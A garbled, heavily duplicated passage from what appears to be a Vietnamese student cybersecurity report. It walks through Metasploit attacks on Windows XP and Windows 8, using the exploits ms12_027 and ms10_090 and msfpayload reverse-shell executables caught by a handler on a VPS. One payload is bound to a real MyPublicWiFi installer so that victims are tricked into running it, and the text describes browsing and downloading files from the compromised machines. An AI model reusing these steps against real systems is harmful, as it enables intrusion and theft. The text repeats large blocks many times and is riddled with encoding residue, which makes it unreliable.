Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
